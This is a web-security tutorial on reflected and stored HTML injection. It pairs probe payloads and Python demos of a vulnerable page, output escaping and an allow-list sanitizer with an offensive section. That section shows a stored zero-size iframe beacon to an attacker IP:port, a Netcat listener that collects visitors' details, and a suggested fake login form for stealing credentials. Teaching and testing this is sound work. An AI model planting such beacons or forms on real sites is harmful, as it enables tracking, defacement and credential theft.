HTML Injection tutorial

HTML Injection

To understand what HTML injection is, we first need to know what HTML is.

HTML (HyperText Markup Language) is the language used to build websites. Web pages and their content are sent to the browser as HTML documents; the browser then renders those documents into the pages the end user sees.

In this tutorial, we will learn how to perform HTML injection in practice.

What is HTML Injection?

HTML injection is an attack in which HTML code is injected through a search field, a URL parameter or any other input that the site fails to sanitize. The attacker submits malicious HTML through such a field in order to change the page's layout or the content that is shown to other users. Because the injected markup is rendered by the browser exactly like the site's own HTML, a victim cannot tell it apart from the real page.
We are going to look at the types of HTML injection and how to perform each one.

Types of HTML Injections

  • Reflected HTML Injection
  • Stored HTML Injection

Reflected HTML Injection

A reflected injection can be delivered through either HTTP method the page accepts, GET or POST. The difference is where the data travels:
with POST, the parameters are sent in the request body;
with GET, the parameters are part of the URL (the query string).
By checking the page's source code (the method attribute of the <form> tag) we can find out which method the website uses.

Reflected HTML Injection (GET)

Reflected GET injection occurs when our input is sent in the URL and displayed (reflected) back on the page. If we submit an HTML tag to a vulnerable page, it is rendered immediately, because the tag is written unescaped into the page's HTML document.

As you can see in the image below:

Reflected get injection
As we typed the HTML tag <h1>html injection</h1> into the login form, it is rendered as a heading on the page, which means this site is vulnerable to HTML injection.

To find out whether a page is vulnerable, it is enough to submit any HTML tag and see whether it is rendered rather than shown as text. A <h1> or <b> tag is a good probe because the visual change is obvious. If the tag comes back as literal text (&lt;h1&gt; in the page source), the input is being encoded and the page is not vulnerable at that point.

Reflected HTML Injection (POST)

Reflected POST injection occurs when an attacker sends malicious HTML code in the parameters of a POST request instead of valid form values.

It is a little harder to exploit than the GET case, because POST data is sent in the request body rather than in the URL, so we cannot simply edit the address bar; sometimes we need a tool such as Tamper Data (a Firefox add-on) or an intercepting proxy to craft the POST request and send it to the server.

Reflected POST Injection

In the image above the simple HTML code <h1>Hacking Castle</h1> is rendered on the page, but this time it was sent to the server by the POST method, so it does not appear in the URL as a parameter.
We will see how to use Tamper Data in the next type.
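The GET and POST checks above can be reproduced offline against a toy form handler. The following is an added example written for this tutorial, not code from the original page or from any real application: it builds the page the vulnerable way (string concatenation) and the fixed way (html.escape on output), feeds it the same <h1> probe through a GET query string and a POST body, and reports whether the raw tag comes back unescaped. The endpoint, the parameter name "name" and the page template are assumptions for the demo; run the file to also get a local server you can probe with curl or a browser.

```python
import html
import sys
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

# The probe tag the tutorial types into the form.
CANARY = "<h1>html injection</h1>"


def render_page(name: str, escape_output: bool) -> str:
    """Page template of the toy app (assumed for this demo, not a real site's code).

    escape_output=False reproduces the vulnerable pattern: the user value is
    concatenated straight into the HTML.  escape_output=True is the fix:
    html.escape() turns < > & " ' into entities, so the browser shows them
    as text instead of parsing them as markup.
    """
    shown = html.escape(name, quote=True) if escape_output else name
    return f"<html><body><h2>Welcome {shown}</h2></body></html>"


def handle(method: str, target: str, body: bytes, escape_output: bool) -> str:
    """Dispatch one request the way a simple form handler would.

    GET: the 'name' parameter is read from the query string in the URL.
    POST: the 'name' parameter is read from the urlencoded request body.
    """
    if method == "GET":
        params = urllib.parse.parse_qs(urllib.parse.urlsplit(target).query)
    elif method == "POST":
        params = urllib.parse.parse_qs(body.decode("utf-8", "replace"))
    else:
        params = {}
    name = params.get("name", [""])[0]
    return render_page(name, escape_output)


def reflected_unescaped(page: str, probe: str = CANARY) -> bool:
    """The tutorial's check: the raw tag comes back verbatim in the document."""
    return probe in page


def get_target(probe: str = CANARY) -> str:
    """Request-line target for the GET variant, e.g. /?name=%3Ch1%3E..."""
    return "/?" + urllib.parse.urlencode({"name": probe})


def post_body(probe: str = CANARY) -> bytes:
    """application/x-www-form-urlencoded body for the POST variant."""
    return urllib.parse.urlencode({"name": probe}).encode()


class ToyHandler(BaseHTTPRequestHandler):
    """Serves the toy app on localhost so the probes can be tried with curl
    or a browser; --safe switches on output encoding."""
    escape_output = False

    def _serve(self, body: bytes) -> None:
        page = handle(self.command, self.path, body, self.escape_output).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(page)))
        self.end_headers()
        self.wfile.write(page)

    def do_GET(self) -> None:
        self._serve(b"")

    def do_POST(self) -> None:
        length = int(self.headers.get("Content-Length", "0"))
        self._serve(self.rfile.read(length))


if __name__ == "__main__":
    ToyHandler.escape_output = "--safe" in sys.argv
    for mode in (False, True):
        page = handle("GET", get_target(), b"", mode)
        print(f"escape_output={mode}: reflected={reflected_unescaped(page)}")
    print("listening on http://127.0.0.1:8000/ (Ctrl-C to stop)")
    HTTPServer(("127.0.0.1", 8000), ToyHandler).serve_forever()
```

With the server running, `curl 'http://127.0.0.1:8000/?name=%3Ch1%3Ehi%3C/h1%3E'` shows the GET reflection and `curl -d 'name=<h1>hi</h1>' http://127.0.0.1:8000/` the POST one; start it with `--safe` and both come back as &lt;h1&gt; entities. The point to take away is that the method only changes how the payload is delivered; whether it is rendered depends solely on the output encoding of the page.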

Reflected HTML Injection ( URL )

Reflected URL HTML injection occurs when an attacker sends HTML code as part of the website's URL and the page writes the requested URL (for example into a link on the page) into its own HTML document, so the injected markup is rendered.

This time we will use Tamper Data to craft the URL and send it to the server. Anyone who opens the same crafted URL will see the injected content, so the link can be sent to other users as a lure.

To do that, open Tamper Data, edit the URL of the request before it is sent, and let the modified request go through to the server.

Editing url in tamper data

Reflected url

As you can see in the image above, the link's URL on the page has changed to the request we crafted in Tamper Data.
Because the page echoes the URL, the same injection works for anyone who follows our link; with a payload that persists on the server we can go further and collect user information,
which we will see in the next type of HTML injection.

Stored HTML Injection

A stored injection attack occurs when malicious HTML code is saved on the web server (for example in a database) and is then rendered every time a victim loads the page that displays it.

Stored HTML Injection

This page contains a form that stores the user's input and lists it below. If the stored value is not encoded before it is written into the page, any HTML tag that was submitted is injected into the document, and the page is vulnerable to stored HTML injection.

We will use the HTML tag

     <h1>Hacking Castle</h1>

to see whether it is vulnerable or not.

vulnerable to stored HTML Injection

As we can see, the HTML tag is stored and rendered on the page.

Let's see another example. This time we will use <script>alert("Hacking Castle");</script>
This JavaScript code makes the page show a popup alert. Once injected markup carries script that actually runs, the issue is usually classified as stored cross-site scripting (XSS); HTML injection is the broader case, and the fix is the same: encode user input when it is written into the page.


In the image above we can see the popup appear on the page. Because the payload is also stored together with the form data, it will pop up for whoever opens or refreshes that page.

That is the difference between reflected and stored HTML injection: a reflected payload only affects the request that carries it, while a stored one affects every later visitor.

So this is stored HTML injection. Now we are going to see how we can escalate further to steal user information.
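Encoding everything with html.escape is the right fix when the field is plain text, but a comment or blog form often has to allow a little formatting, and that is exactly where the stored injections above get through. The block below is an added example written for this tutorial, not code from the original page or from any framework: an allow-list sanitizer built on the standard library's html.parser that keeps only a few harmless tags, strips every attribute except an http(s) href, discards the whole content of script, style and iframe elements, entity-encodes all text, and re-balances tags so one unclosed tag cannot swallow the rest of the page. The tag list and the sample inputs are assumptions chosen for the demo.

```python
import html
from html.parser import HTMLParser

# Tags a comment field may keep, with the attributes allowed on each (assumed policy).
ALLOWED = {"b": set(), "i": set(), "em": set(), "strong": set(),
           "p": set(), "br": set(), "a": {"href"}}
VOID = {"br"}
# Elements whose whole content is discarded, not just the tag itself.
DROP_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript"}
SAFE_SCHEMES = ("http://", "https://")


class Sanitizer(HTMLParser):
    """Allow-list sanitizer: tags not in ALLOWED are removed (their text is kept),
    attributes not allowed for their tag are removed, all text is entity-encoded
    on the way out, and the output is re-balanced so that an unclosed tag in one
    stored comment cannot restyle or hide the rest of the page."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.open: list[str] = []       # allowed tags emitted and not yet closed
        self.dropping: list[str] = []   # DROP_CONTENT elements we are inside

    def handle_starttag(self, tag, attrs):
        if self.dropping:
            if tag in DROP_CONTENT:
                self.dropping.append(tag)
            return
        if tag in DROP_CONTENT:
            self.dropping.append(tag)
            return
        if tag not in ALLOWED:
            return                      # unknown tag (h1, img, ...): drop it, keep its text
        rendered = []
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue
            if name == "href" and not value.lower().startswith(SAFE_SCHEMES):
                continue                # blocks javascript:, data:, vbscript: links
            rendered.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(rendered)}>")
        if tag not in VOID:
            self.open.append(tag)

    def handle_endtag(self, tag):
        if self.dropping:
            if tag == self.dropping[-1]:
                self.dropping.pop()
            return
        if tag in self.open:
            while self.open:            # close inner tags first to stay well-formed
                inner = self.open.pop()
                self.out.append(f"</{inner}>")
                if inner == tag:
                    break

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        pass                            # HTML comments are dropped entirely

    def result(self) -> str:
        while self.open:                # close whatever the input left open
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize(fragment: str) -> str:
    """Return a safe HTML fragment for storing and later rendering a comment."""
    parser = Sanitizer()
    parser.feed(fragment)
    parser.close()
    return parser.result()


if __name__ == "__main__":
    # Constructed sample inputs: the tutorial's payloads plus a few edge cases.
    for sample in ('<h1>Hacking Castle</h1>',
                   '<script>alert("Hacking Castle");</script>',
                   '<iframe src="http://10.0.0.5:4444/test" height="0" width="0"></iframe>',
                   '<a href="javascript:alert(1)">click</a>',
                   '<b>bold <i>both</b> after',
                   'Tom & Jerry'):
        print(repr(sample), "->", repr(sanitize(sample)))
```

Sanitize at the point where the comment is rendered, not only when it is saved, so that values that reached the database before the fix are covered too. The allow-list direction matters: a deny-list that strips `<script>` still lets the iframe beacon and an `<a href="javascript:...">` through, which is why the example refuses everything it does not know.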

Stealing user Information using HTML Injection

Here we are going to use an iframe tag and a Netcat listener to collect information about the users who load the page.
First, we will use this iframe tag (note that the src URL must be closed with a double quote):

<iframe src="http://(IP:port)/test" height="0" width="0"></iframe>

Before hitting submit, open a Netcat listener in a terminal with the command

nc -nvlp (port)

(-l listen, -p port, -v verbose, -n no DNS lookups). This opens the listener; then hit submit. Every user who opens the page makes their browser request http://(IP:port)/test, and the listener prints that raw HTTP request. What arrives is the visitor's IP address, User-Agent and Referer (the URL of the page they were on); the victim site's own cookies are not included, because a browser only sends cookies that belong to the listener's host. To get actual login credentials we need the fake login form mentioned in the ideas below.

getting user credentials using HTML Injection

More ideas to play with

  • HTML is a very good language to play with. We can inject an HTML login form that posts to our Netcat listener to collect users' login credentials.

  • There is a huge amount of HTML that can be used to deface a site if it is vulnerable.

I leave these for you to play with; have fun.

A cheat sheet of HTML injection payloads will help you with that.


It is noticeable that there is far less literature and information about HTML injection than about other injection attacks, so testers may choose not to perform this kind of testing. In that case, the risk of an HTML injection attack is probably not assessed well enough.

As we have seen in this tutorial, with this kind of injection the whole design of your site can be defaced and even users' login data can be stolen. It is therefore strongly recommended to include HTML injection in security testing and to build good knowledge of it.

That's all about HTML injection.

Happy Hacking
